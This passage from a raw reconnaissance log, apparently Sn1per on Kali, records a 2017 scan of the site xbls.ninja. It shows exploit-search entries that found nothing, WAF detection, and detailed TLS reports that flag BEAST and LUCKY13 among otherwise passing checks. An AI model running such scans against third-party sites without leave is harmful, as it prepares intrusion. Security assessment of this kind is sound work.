674. |_[ + ] Target:: [ https://xbls.ninja/product/ninja-token-3-day/ ]
675. |_[ + ] Exploit::
676. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:104.27.135.184:443
677. |_[ + ] More details:: / - / , ISP:
678. |_[ + ] Found:: UNIDENTIFIED
679.  
680. _[ - ]::--------------------------------------------------------------------------------------------------------------
681. |_[ + ] [ 12 / 19 ]-[08:14:34] [ - ]
682. |_[ + ] Target:: [ https://xbls.ninja/product/ninja-token-1-day/ ]
683. |_[ + ] Exploit::
684. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:104.27.135.184:443
685. |_[ + ] More details:: / - / , ISP:
686. |_[ + ] Found:: UNIDENTIFIED
687.  
688. _[ - ]::--------------------------------------------------------------------------------------------------------------
689. |_[ + ] [ 13 / 19 ]-[08:14:35] [ - ]
690. |_[ + ] Target:: [ https://xbls.ninja/product/ninja-token-4-weeks/ ]
691. |_[ + ] Exploit::
692. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:104.27.135.184:443
693. |_[ + ] More details:: / - / , ISP:
694. |_[ + ] Found:: UNIDENTIFIED
695.  
696. _[ - ]::--------------------------------------------------------------------------------------------------------------
697. |_[ + ] [ 14 / 19 ]-[08:14:36] [ - ]
698. |_[ + ] Target:: [ https://xbls.ninja/product/ninja-token-2-weeks/ ]
699. |_[ + ] Exploit::
700. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:104.27.135.184:443
701. |_[ + ] More details:: / - / , ISP:
702. |_[ + ] Found:: UNIDENTIFIED
703.  
704. _[ - ]::--------------------------------------------------------------------------------------------------------------
705. |_[ + ] [ 15 / 19 ]-[08:14:37] [ - ]
706. |_[ + ] Target:: [ https://xbls.ninja/product/african-combo-token-31-day/ ]
707. |_[ + ] Exploit::
708. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:104.27.135.184:443
709. |_[ + ] More details:: / - / , ISP:
710. |_[ + ] Found:: UNIDENTIFIED
711.  
712. _[ - ]::--------------------------------------------------------------------------------------------------------------
713. |_[ + ] [ 16 / 19 ]-[08:14:37] [ - ]
714. |_[ + ] Target:: [ https://xbls.ninja/product/african-combo-token-1-day/ ]
715. |_[ + ] Exploit::
716. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:104.27.135.184:443
717. |_[ + ] More details:: / - / , ISP:
718. |_[ + ] Found:: UNIDENTIFIED
719.  
720. _[ - ]::--------------------------------------------------------------------------------------------------------------
721. |_[ + ] [ 17 / 19 ]-[08:14:38] [ - ]
722. |_[ + ] Target:: [ https://xbls.ninja/product/african-combo-token-7-day/ ]
723. |_[ + ] Exploit::
724. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:104.27.135.184:443
725. |_[ + ] More details:: / - / , ISP:
726. |_[ + ] Found:: UNIDENTIFIED
727.  
728. _[ - ]::--------------------------------------------------------------------------------------------------------------
729. |_[ + ] [ 18 / 19 ]-[08:14:39] [ - ]
730. |_[ + ] Target:: [ https://xbls.ninja/product-category/african-plus-ninja-tokens/ ]
731. |_[ + ] Exploit::
732. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:104.27.135.184:443
733. |_[ + ] More details:: / - / , ISP:
734. |_[ + ] Found:: UNIDENTIFIED
735.  
736. [ INFO ] [ Shutting down ]
737. [ INFO ] [ End of process INURLBR at [13-07-2017 08:14:39]
738. [ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
739. [ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-xbls.ninja.txt ]
740. |_________________________________________________________________________________________
741.  
742. \_________________________________________________________________________________________/
743.  
744. + -- --=[Port 110 closed... skipping.
745. + -- --=[Port 111 closed... skipping.
746. + -- --=[Port 135 closed... skipping.
747. + -- --=[Port 139 closed... skipping.
748. + -- --=[Port 161 closed... skipping.
749. + -- --=[Port 162 closed... skipping.
750. + -- --=[Port 389 closed... skipping.
751. + -- --=[Port 443 opened... running tests...
752. + -- ----------------------------=[Checking for WAF]=------------------------ -- +
753.  
754. ^ ^
755. _ __ _ ____ _ __ _ _ ____
756. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
757. | V V // o // _/ | V V // 0 // 0 // _/
758. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
759. <
760. ...'
761.  
762. WAFW00F - Web Application Firewall Detection Tool
763.  
764. By Sandro Gauci && Wendel G. Henrique
765.  
766. Checking https://xbls.ninja
767. The site https://xbls.ninja is behind a CloudFlare
768. Number of requests: 1
769.  
770. + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +
771. https://xbls.ninja [403 Forbidden] CloudFlare, Cookies[__cfduid], Country[UNITED STATES][US], HTML5, HTTPServer[cloudflare-nginx], HttpOnly[__cfduid], IP[104.27.134.184], Strict-Transport-Security[max-age=15552000], Title[Sucuri WebSite Firewall - Access Denied], UncommonHeaders[x-content-type-options,x-sucuri-id,cf-ray], X-Frame-Options[SAMEORIGIN], X-XSS-Protection[1; mode=block]
772.  
773. + -- ----------------------------=[Gathering SSL/TLS Info]=------------------ -- +
774.  
775.  
776.  
777. AVAILABLE PLUGINS
778. -----------------
779.  
780. PluginSessionResumption
781. PluginHeartbleed
782. PluginOpenSSLCipherSuites
783. PluginChromeSha1Deprecation
784. PluginCompression
785. PluginCertInfo
786. PluginSessionRenegotiation
787. PluginHSTS
788.  
789.  
790.  
791. CHECKING HOST(S) AVAILABILITY
792. -----------------------------
793.  
794. xbls.ninja:443 => 104.27.135.184:443
795.  
796.  
797.  
798. SCAN RESULTS FOR XBLS.NINJA:443 - 104.27.135.184:443
799. ----------------------------------------------------
800.  
801. * Deflate Compression:
802. OK - Compression disabled
803.  
804. * Session Renegotiation:
805. Client-initiated Renegotiations: OK - Rejected
806. Secure Renegotiation: OK - Supported
807.  
808. * Session Resumption:
809. With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
810. With TLS Session Tickets: OK - Supported
811.  
812. * Certificate - Content:
813. SHA1 Fingerprint: abfb344f0354964ab4e2a0473d42e02e23acd61d
814. Common Name: sni87911.cloudflaressl.com
815. Issuer: COMODO ECC Domain Validation Secure Server CA 2
816. Serial Number: CFF571D4DF39A468DFCA6E198BAE1FA7
817. Not Before: Jul 6 00:00:00 2017 GMT
818. Not After: Jan 12 23:59:59 2018 GMT
819. Signature Algorithm: ecdsa-with-SHA256
820. Public Key Algorithm: id-ecPublicKey
821. Key Size: 256 bit
822. X509v3 Subject Alternative Name: {'DNS': ['sni87911.cloudflaressl.com', '*.anhaniuso.top', '*.bit.cm', '*.charlottestowels.xyz', '*.daypeada.top', '*.dedinow.com', '*.digitalgiftcodes.com', '*.digitalpaymentgateway.com', '*.giofalco.com', '*.ideal-2vh3g.ga', '*.landsdownefootandankle.com', '*.learnlsp.com', '*.lsp.academy', '*.michaelfearne.com', '*.nanovds.com', '*.pro-palo.ru', '*.scoresbuch.cf', '*.summitvillegoodshopping.ga', '*.swell-fstf8.ml', '*.todaysfamilymagazine.com', '*.txtbattle.ru', '*.usadba-nsk.ru', '*.xbls.ninja', '*.xblsyndicate.ninja', 'anhaniuso.top', 'bit.cm', 'charlottestowels.xyz', 'daypeada.top', 'dedinow.com', 'digitalgiftcodes.com', 'digitalpaymentgateway.com', 'giofalco.com', 'ideal-2vh3g.ga', 'landsdownefootandankle.com', 'learnlsp.com', 'lsp.academy', 'michaelfearne.com', 'nanovds.com', 'pro-palo.ru', 'scoresbuch.cf', 'summitvillegoodshopping.ga', 'swell-fstf8.ml', 'todaysfamilymagazine.com', 'txtbattle.ru', 'usadba-nsk.ru', 'xbls.ninja', 'xblsyndicate.ninja']}
823.  
824. * Certificate - Trust:
825. Hostname Validation: OK - Subject Alternative Name matches
826. Google CA Store (09/2015): OK - Certificate is trusted
827. Java 6 CA Store (Update 65): OK - Certificate is trusted
828. Microsoft CA Store (09/2015): OK - Certificate is trusted
829. Apple CA Store (OS X 10.10.5): OK - Certificate is trusted
830. Mozilla NSS CA Store (09/2015): OK - Certificate is trusted
831. Certificate Chain Received: ['sni87911.cloudflaressl.com', 'COMODO ECC Domain Validation Secure Server CA 2', 'COMODO ECC Certification Authority']
832.  
833. * Certificate - OCSP Stapling:
834. OCSP Response Status: successful
835. Validation w/ Mozilla's CA Store: OK - Response is trusted
836. Responder Id: 40096167F0BC83714FDE12082C6FD4D42B763D96
837. Cert Status: good
838. Cert Serial Number: CFF571D4DF39A468DFCA6E198BAE1FA7
839. This Update: Jul 8 21:50:39 2017 GMT
840. Next Update: Jul 15 21:50:39 2017 GMT
841.  
842. * SSLV2 Cipher Suites:
843. Server rejected all cipher suites.
844.  
845. * SSLV3 Cipher Suites:
846. Server rejected all cipher suites.
847.  
848.  
849.  
850. SCAN COMPLETED IN 0.73 S
851. ------------------------
852. Version: 1.11.10-static
853. OpenSSL 1.0.2-chacha (1.0.2g-dev)
854.  
855. Testing SSL server xbls.ninja on port 443 using SNI name xbls.ninja
856.  
857. TLS Fallback SCSV:
858. Server does not support TLS Fallback SCSV
859.  
860. TLS renegotiation:
861. Secure session renegotiation supported
862.  
863. TLS Compression:
864. Compression disabled
865.  
866. Heartbleed:
867. TLS 1.2 not vulnerable to heartbleed
868. TLS 1.1 not vulnerable to heartbleed
869. TLS 1.0 not vulnerable to heartbleed
870.  
871. Supported Server Cipher(s):
872. Preferred TLSv1.2 256 bits ECDHE-ECDSA-CHACHA20-POLY1305 Curve P-256 DHE 256
873. Accepted TLSv1.2 128 bits ECDHE-ECDSA-AES128-GCM-SHA256 Curve P-256 DHE 256
874. Accepted TLSv1.2 128 bits ECDHE-ECDSA-AES128-SHA Curve P-256 DHE 256
875. Accepted TLSv1.2 128 bits ECDHE-ECDSA-AES128-SHA256 Curve P-256 DHE 256
876. Accepted TLSv1.2 256 bits ECDHE-ECDSA-AES256-GCM-SHA384 Curve P-256 DHE 256
877. Accepted TLSv1.2 256 bits ECDHE-ECDSA-AES256-SHA Curve P-256 DHE 256
878. Accepted TLSv1.2 256 bits ECDHE-ECDSA-AES256-SHA384 Curve P-256 DHE 256
879. Preferred TLSv1.1 128 bits ECDHE-ECDSA-AES128-SHA Curve P-256 DHE 256
880. Accepted TLSv1.1 256 bits ECDHE-ECDSA-AES256-SHA Curve P-256 DHE 256
881. Preferred TLSv1.0 128 bits ECDHE-ECDSA-AES128-SHA Curve P-256 DHE 256
882. Accepted TLSv1.0 256 bits ECDHE-ECDSA-AES256-SHA Curve P-256 DHE 256
883.  
884. SSL Certificate:
885. Signature Algorithm: ecdsa-with-SHA256
886. Subject: sni87911.cloudflaressl.com
887. Altnames: DNS:sni87911.cloudflaressl.com, DNS:*.anhaniuso.top, DNS:*.bit.cm, DNS:*.charlottestowels.xyz, DNS:*.daypeada.top, DNS:*.dedinow.com, DNS:*.digitalgiftcodes.com, DNS:*.digitalpaymentgateway.com, DNS:*.giofalco.com, DNS:*.ideal-2vh3g.ga, DNS:*.landsdownefootandankle.com, DNS:*.learnlsp.com, DNS:*.lsp.academy, DNS:*.michaelfearne.com, DNS:*.nanovds.com, DNS:*.pro-palo.ru, DNS:*.scoresbuch.cf, DNS:*.summitvillegoodshopping.ga, DNS:*.swell-fstf8.ml, DNS:*.todaysfamilymagazine.com, DNS:*.txtbattle.ru, DNS:*.usadba-nsk.ru, DNS:*.xbls.ninja, DNS:*.xblsyndicate.ninja, DNS:anhaniuso.top, DNS:bit.cm, DNS:charlottestowels.xyz, DNS:daypeada.top, DNS:dedinow.com, DNS:digitalgiftcodes.com, DNS:digitalpaymentgateway.com, DNS:giofalco.com, DNS:ideal-2vh3g.ga, DNS:landsdownefootandankle.com, DNS:learnlsp.com, DNS:lsp.academy, DNS:michaelfearne.com, DNS:nanovds.com, DNS:pro-palo.ru, DNS:scoresbuch.cf, DNS:summitvillegoodshopping.ga, DNS:swell-fstf8.ml, DNS:todaysfamilymagazine.com, DNS:txtbattle.ru, DNS:usadba-nsk.ru, DNS:xbls.ninja, DNS:xblsyndicate.ninja
888. Issuer: COMODO ECC Domain Validation Secure Server CA 2
889.  
890. Not valid before: Jul 6 00:00:00 2017 GMT
891. Not valid after: Jan 12 23:59:59 2018 GMT
892.  
893. ###########################################################
894. testssl 2.9dev from https://testssl.sh/dev/
895.  
896. This program is free software. Distribution and
897. modification under GPLv2 permitted.
898. USAGE w/o ANY WARRANTY. USE IT AT YOUR OWN RISK!
899.  
900. Please file bugs @ https://testssl.sh/bugs/
901.  
902. ###########################################################
903.  
904. Using "OpenSSL 1.0.2-chacha (1.0.2i-dev)" [~183 ciphers]
905. on kali:/usr/share/sniper/plugins/testssl.sh/bin/openssl.Linux.x86_64
906. (built: "Jun 22 19:32:29 2016", platform: "linux-x86_64")
907.  
908.  
909. Testing all IPv4 addresses (port 443): 104.27.134.184 104.27.135.184
910. --------------------------------------------------------------------
911. Start 2017-07-13 08:14:47 -->> 104.27.134.184:443 (xbls.ninja) <<--
912.  
913. further IP addresses: 104.27.135.184
914. rDNS (104.27.134.184): --
915. Service detected: HTTP
916.  
917.  
918. Testing protocols via sockets except SPDY+HTTP2
919.  
920. SSLv2 not offered (OK)
921. SSLv3 not offered (OK)
922. TLS 1 offered
923. TLS 1.1 offered
924. TLS 1.2 offered (OK)
925. SPDY/NPN h2, spdy/3.1, http/1.1 (advertised)
926. HTTP2/ALPN h2, spdy/3.1, http/1.1 (offered)
927.  
928. Testing ~standard cipher categories
929.  
930. NULL ciphers (no encryption) not offered (OK)
931. Anonymous NULL Ciphers (no authentication) not offered (OK)
932. Export ciphers (w/o ADH+NULL) not offered (OK)
933. LOW: 64 Bit + DES encryption (w/o export) not offered (OK)
934. Weak 128 Bit ciphers (SEED, IDEA, RC[2,4]) not offered (OK)
935. Triple DES Ciphers (Medium) not offered (OK)
936. High encryption (AES+Camellia, no AEAD) offered (OK)
937. Strong encryption (AEAD ciphers) offered (OK)
938.  
939.  
940. Testing robust (perfect) forward secrecy, (P)FS -- omitting Null Authentication/Encryption, 3DES, RC4
941.  
942. PFS is offered (OK) ECDHE-ECDSA-CHACHA20-POLY1305-OLD ECDHE-ECDSA-AES256-GCM-SHA384
943. ECDHE-ECDSA-AES256-SHA384 ECDHE-ECDSA-AES256-SHA
944. ECDHE-ECDSA-CHACHA20-POLY1305 ECDHE-ECDSA-AES128-GCM-SHA256
945. ECDHE-ECDSA-AES128-SHA256 ECDHE-ECDSA-AES128-SHA
946. Elliptic curves offered: secp224r1 prime256v1 secp384r1 secp521r1 X25519
947.  
948.  
949. Testing server preferences
950.  
951. Has server cipher order? yes (OK)
952. Negotiated protocol TLSv1.2
953. Negotiated cipher ECDHE-ECDSA-CHACHA20-POLY1305-OLD, 256 bit ECDH (P-256)
954. Cipher order
955. TLSv1: ECDHE-ECDSA-AES128-SHA ECDHE-ECDSA-AES256-SHA
956. TLSv1.1: ECDHE-ECDSA-AES128-SHA ECDHE-ECDSA-AES256-SHA
957. TLSv1.2: ECDHE-ECDSA-CHACHA20-POLY1305-OLD ECDHE-ECDSA-CHACHA20-POLY1305
958. ECDHE-ECDSA-AES128-GCM-SHA256 ECDHE-ECDSA-AES128-SHA ECDHE-ECDSA-AES128-SHA256
959. ECDHE-ECDSA-AES256-GCM-SHA384 ECDHE-ECDSA-AES256-SHA ECDHE-ECDSA-AES256-SHA384
960.  
961.  
962. Testing server defaults (Server Hello)
963.  
964. TLS extensions (standard) "renegotiation info/#65281" "server name/#0" "session ticket/#35"
965. "status request/#5" "next protocol/#13172" "EC point formats/#11"
966. "extended master secret/#23" "signed certificate timestamps/#18"
967. "application layer protocol negotiation/#16"
968. Session Ticket RFC 5077 hint 64800 seconds (PFS requires session ticket keys to be rotated <= daily)
969. SSL Session ID support yes
970. Session Resumption Tickets: yes, ID: yes
971. TLS clock skew -7166 sec from localtime
972. Signature Algorithm ECDSA with SHA256
973. Server key size ECDSA 256 bits
974. Fingerprint / Serial SHA1 ABFB344F0354964AB4E2A0473D42E02E23ACD61D / CFF571D4DF39A468DFCA6E198BAE1FA7
975. SHA256 D42879DD9F8FD059F33D961908A75AEE461869EE1E3A0E3284B7B1A57D8829C9
976. Common Name (CN) sni87911.cloudflaressl.com (request w/o SNI didn't succeed, usual for EC certificates)
977. subjectAltName (SAN) sni87911.cloudflaressl.com *.anhaniuso.top *.bit.cm
978. *.charlottestowels.xyz *.daypeada.top *.dedinow.com
979. *.digitalgiftcodes.com *.digitalpaymentgateway.com *.giofalco.com
980. *.ideal-2vh3g.ga *.landsdownefootandankle.com *.learnlsp.com
981. *.lsp.academy *.michaelfearne.com *.nanovds.com *.pro-palo.ru
982. *.scoresbuch.cf *.summitvillegoodshopping.ga *.swell-fstf8.ml
983. *.todaysfamilymagazine.com *.txtbattle.ru *.usadba-nsk.ru *.xbls.ninja
984. *.xblsyndicate.ninja anhaniuso.top bit.cm charlottestowels.xyz
985. daypeada.top dedinow.com digitalgiftcodes.com digitalpaymentgateway.com
986. giofalco.com ideal-2vh3g.ga landsdownefootandankle.com learnlsp.com
987. lsp.academy michaelfearne.com nanovds.com pro-palo.ru scoresbuch.cf
988. summitvillegoodshopping.ga swell-fstf8.ml todaysfamilymagazine.com
989. txtbattle.ru usadba-nsk.ru xbls.ninja xblsyndicate.ninja
990. Issuer COMODO ECC Domain Validation Secure Server CA 2 (COMODO CA Limited from GB)
991. Trust (hostname) Ok via SAN (SNI mandatory)
992. Chain of trust Ok
993. EV cert (experimental) no
994. Certificate Expiration 183 >= 60 days (2017-07-06 00:00 --> 2018-01-12 23:59 +0000)
995. # of certificates provided 3
996. Certificate Revocation List http://crl.comodoca4.com/COMODOECCDomainValidationSecureServerCA2.crl
997. OCSP URI http://ocsp.comodoca4.com
998. OCSP stapling offered
999. OCSP must staple no
1000. DNS CAA RR (experimental) --
1001.  
1002.  
1003. Testing HTTP header response @ "/"
1004.  
1005. HTTP Status Code 200 OK
1006. HTTP clock skew -7166 sec from localtime
1007. Strict Transport Security 180 days=15552000 s, just this domain
1008. Public Key Pinning --
1009. Server banner cloudflare-nginx
1010. Application banner --
1011. Cookie(s) 1 issued: NOT secure, 1/1 HttpOnly
1012. Security headers X-Frame-Options SAMEORIGIN
1013. X-XSS-Protection 1; mode=block
1014. X-Content-Type-Options nosniff
1015. Reverse Proxy banner --
1016.  
1017.  
1018. Testing vulnerabilities
1019.  
1020. Heartbleed (CVE-2014-0160) not vulnerable (OK), no heartbeat extension
1021. CCS (CVE-2014-0224) not vulnerable (OK)
1022. Ticketbleed (CVE-2016-9244), experiment. not vulnerable (OK), no session tickets
1023. Secure Renegotiation (CVE-2009-3555) not vulnerable (OK)
1024. Secure Client-Initiated Renegotiation not vulnerable (OK)
1025. CRIME, TLS (CVE-2012-4929) not vulnerable (OK)
1026. BREACH (CVE-2013-3587) potentially NOT ok, uses gzip HTTP compression. - only supplied "/" tested
1027. Can be ignored for static pages or if no secrets in the page
1028. POODLE, SSL (CVE-2014-3566) not vulnerable (OK)
1029. TLS_FALLBACK_SCSV (RFC 7507) Downgrade attack prevention supported (OK)
1030. SWEET32 (CVE-2016-2183, CVE-2016-6329) not vulnerable (OK)
1031. FREAK (CVE-2015-0204) not vulnerable (OK)
1032. DROWN (CVE-2016-0800, CVE-2016-0703) not vulnerable on this port (OK)
1033. no RSA certificate, thus certificate can't be used with SSLv2 elsewhere
1034. LOGJAM (CVE-2015-4000), experimental not vulnerable (OK): no DH EXPORT ciphers, no DH key detected
1035. BEAST (CVE-2011-3389) TLS1: ECDHE-ECDSA-AES128-SHA ECDHE-ECDSA-AES256-SHA
1036. VULNERABLE -- but also supports higher protocols (possible mitigation): TLSv1.1 TLSv1.2
1037. LUCKY13 (CVE-2013-0169) VULNERABLE, uses cipher block chaining (CBC) ciphers
1038. RC4 (CVE-2013-2566, CVE-2015-2808) no RC4 ciphers detected (OK)
1039.  
1040.  
1041. Testing 359 ciphers via OpenSSL plus sockets against the server, ordered by encryption strength
1042.  
1043. Hexcode Cipher Suite Name (OpenSSL) KeyExch. Encryption Bits Cipher Suite Name (RFC)
1044. -----------------------------------------------------------------------------------------------------------------------------
1045. xcc14 ECDHE-ECDSA-CHACHA20-POLY1305-OLD ECDH 256 ChaCha20 256 TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256_OLD
1046. xc02c ECDHE-ECDSA-AES256-GCM-SHA384 ECDH 256 AESGCM 256 TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384
1047. xc024 ECDHE-ECDSA-AES256-SHA384 ECDH 256 AES 256 TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384
1048. xc00a ECDHE-ECDSA-AES256-SHA ECDH 256 AES 256 TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA
1049. xcca9 ECDHE-ECDSA-CHACHA20-POLY1305 ECDH 253 ChaCha20 256 TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256
1050. xc02b ECDHE-ECDSA-AES128-GCM-SHA256 ECDH 256 AESGCM 128 TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256
1051. xc023 ECDHE-ECDSA-AES128-SHA256 ECDH 256 AES 128 TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256
1052. xc009 ECDHE-ECDSA-AES128-SHA ECDH 256 AES 128 TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA
1053.  
1054.  
1055. Running client simulations via sockets
1056.  
1057. Android 2.3.7 No connection
1058. Android 4.1.1 TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
1059. Android 4.2.2 TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
1060. Android 4.4.2 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
1061. Android 5.0.0 TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305-OLD, 256 bit ECDH (P-256)
1062. Android 6.0 TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305-OLD, 256 bit ECDH (P-256)
1063. Android 7.0 TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305, 253 bit ECDH (X25519)
1064. Baidu Jan 2015 TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
1065. Chrome 51 Win 7 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 253 bit ECDH (X25519)
1066. Edge 13 Win 10 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
1067. Edge 13 Win Phone 10 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
1068. Firefox 49 Win 7 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
1069. Firefox 49 XP SP3 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
1070. IE 11 Win 10 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
1071. IE 11 Win 7 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
1072. IE 11 Win 8.1 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
1073. IE 11 Win Phone 8.1 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
1074. IE 11 Win Phone 8.1 Update TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
1075. IE 6 XP No connection
1076. IE 7 Vista TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
1077. IE 8 Win 7 TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
1078. IE 8 XP No connection
1079. Java 6u45 No connection
1080. Java 7u25 TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
1081. Java 8b132 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
1082. OpenSSL 1.0.1l TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
1083. OpenSSL 1.0.2e TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
1084. Safari 5.1.9 OS X 10.6.8 TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
1085. Safari 6.0.4 OS X 10.8.4 TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
1086. Safari 7 OS X 10.9 TLSv1.2 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
1087. Safari 8 OS X 10.10 TLSv1.2 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
1088. Safari 9 iOS 9 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
1089. Safari 9 OS X 10.11 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
1090. Safari 10 OS X 10.12 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
1091. Apple ATS 9 iOS 9 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
1092. Tor 17.0.9 Win 7 TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
1093.  
1094. Done 2017-07-13 08:15:31 [ 46s] -->> 104.27.134.184:443 (xbls.ninja) <<--
1095.  
1096. --------------------------------------------------------------------
1097. Start 2017-07-13 08:15:31 -->> 104.27.135.184:443 (xbls.ninja) <<--
1098.  
1099. further IP addresses: 104.27.134.184
1100. rDNS (104.27.135.184): --
1101. Service detected: HTTP
1102.  
1103.  
1104. Testing protocols via sockets except SPDY+HTTP2
1105.  
1106. SSLv2 not offered (OK)
1107. SSLv3 not offered (OK)
1108. TLS 1 offered
1109. TLS 1.1 offered
1110. TLS 1.2 offered (OK)
1111. SPDY/NPN h2, spdy/3.1, http/1.1 (advertised)
1112. HTTP2/ALPN h2, spdy/3.1, http/1.1 (offered)
1113.  
1114. Testing ~standard cipher categories
1115.  
1116. NULL ciphers (no encryption) not offered (OK)
1117. Anonymous NULL Ciphers (no authentication) not offered (OK)
1118. Export ciphers (w/o ADH+NULL) not offered (OK)
1119. LOW: 64 Bit + DES encryption (w/o export) not offered (OK)
1120. Weak 128 Bit ciphers (SEED, IDEA, RC[2,4]) not offered (OK)
1121. Triple DES Ciphers (Medium) not offered (OK)
1122. High encryption (AES+Camellia, no AEAD) offered (OK)
1123. Strong encryption (AEAD ciphers) offered (OK)
1124.  
1125.  
1126. Testing robust (perfect) forward secrecy, (P)FS -- omitting Null Authentication/Encryption, 3DES, RC4
1127.  
1128. PFS is offered (OK) ECDHE-ECDSA-CHACHA20-POLY1305-OLD ECDHE-ECDSA-AES256-GCM-SHA384
1129. ECDHE-ECDSA-AES256-SHA384 ECDHE-ECDSA-AES256-SHA
1130. ECDHE-ECDSA-CHACHA20-POLY1305 ECDHE-ECDSA-AES128-GCM-SHA256
1131. ECDHE-ECDSA-AES128-SHA256 ECDHE-ECDSA-AES128-SHA
1132. Elliptic curves offered: secp224r1 prime256v1 secp384r1 secp521r1 X25519
1133.  
1134.  
1135. Testing server preferences
1136.  
1137. Has server cipher order? yes (OK)
1138. Negotiated protocol TLSv1.2
1139. Negotiated cipher ECDHE-ECDSA-CHACHA20-POLY1305-OLD, 256 bit ECDH (P-256)
1140. Cipher order
1141. TLSv1: ECDHE-ECDSA-AES128-SHA ECDHE-ECDSA-AES256-SHA
1142. TLSv1.1: ECDHE-ECDSA-AES128-SHA ECDHE-ECDSA-AES256-SHA
1143. TLSv1.2: ECDHE-ECDSA-CHACHA20-POLY1305-OLD ECDHE-ECDSA-CHACHA20-POLY1305
1144. ECDHE-ECDSA-AES128-GCM-SHA256 ECDHE-ECDSA-AES128-SHA ECDHE-ECDSA-AES128-SHA256
1145. ECDHE-ECDSA-AES256-GCM-SHA384 ECDHE-ECDSA-AES256-SHA ECDHE-ECDSA-AES256-SHA384
1146.  
1147.  
1148. Testing server defaults (Server Hello)
1149.  
1150. TLS extensions (standard) "renegotiation info/#65281" "server name/#0" "session ticket/#35"
1151. "status request/#5" "next protocol/#13172" "EC point formats/#11"
1152. "extended master secret/#23" "signed certificate timestamps/#18"
1153. "application layer protocol negotiation/#16"
1154. Session Ticket RFC 5077 hint 64800 seconds (PFS requires session ticket keys to be rotated <= daily)
1155. SSL Session ID support yes
1156. Session Resumption Tickets: yes, ID: yes
1157. TLS clock skew -7167 sec from localtime
1158. Signature Algorithm ECDSA with SHA256
1159. Server key size ECDSA 256 bits
1160. Fingerprint / Serial SHA1 ABFB344F0354964AB4E2A0473D42E02E23ACD61D / CFF571D4DF39A468DFCA6E198BAE1FA7
1161. SHA256 D42879DD9F8FD059F33D961908A75AEE461869EE1E3A0E3284B7B1A57D8829C9
1162. Common Name (CN) sni87911.cloudflaressl.com (request w/o SNI didn't succeed, usual for EC certificates)
1163. subjectAltName (SAN) sni87911.cloudflaressl.com *.anhaniuso.top *.bit.cm
1164. *.charlottestowels.xyz *.daypeada.top *.dedinow.com
1165. *.digitalgiftcodes.com *.digitalpaymentgateway.com *.giofalco.com
1166. *.ideal-2vh3g.ga *.landsdownefootandankle.com *.learnlsp.com
1167. *.lsp.academy *.michaelfearne.com *.nanovds.com *.pro-palo.ru
1168. *.scoresbuch.cf *.summitvillegoodshopping.ga *.swell-fstf8.ml
